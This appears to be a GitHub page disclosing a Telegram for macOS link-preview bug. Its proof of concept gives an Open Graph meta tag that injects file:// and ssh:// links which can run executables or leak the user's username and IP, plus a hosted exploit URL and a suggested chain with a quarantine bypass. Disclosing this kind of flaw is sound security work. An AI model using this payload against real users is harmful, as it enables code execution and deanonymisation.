Skip to content

Telegram (v4.9.155353) was rendering file:// links + opening them via NSWorkspace.open -> code execution.

Notifications You must be signed in to change notification settings

Metnew/telegram-links-nsworkspace-open

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

Summary

In Telegram for macOS v4.9.155353 (and below) URL parsing logic in Telegram for macOS platform allows running arbitrary executables and applications URI schemes via links injected into the website's preview.

PoC

  1. Send a link to exploit.html - a regular HTML file with <meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" /> tag
  2. Website preview renders file://google.com/bin/sh and ssh://google.com/x as links
  3. Click on the rendered links behaves as NSWorkspace.open util -> if points to executable -> code execution.
  4. Click on ssh:// link -> Terminal.app popups with an active ssh session disclosing user's OS username, ip and other details.

Impact

The bug could be used...

  • to disclose info about user's machine -> OS username, IP, etc
  • to run arbitrary executables and opening arbitrary files on OS
  • to launch arbitrary applications via URI schemes

This bug could be chained with Quarantine issue to open downloaded quarantine-ignored files and chain this into running of attacker-supplied executable.

Additional Details

This bug also exists in iOS, PoC is the same. Impact possibly limited to URI schemes.

PoC URL -> https://telegram-file-link-1xfcjf27f.now.sh/exploit.html

About

Telegram (v4.9.155353) was rendering file:// links + opening them via NSWorkspace.open -> code execution.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages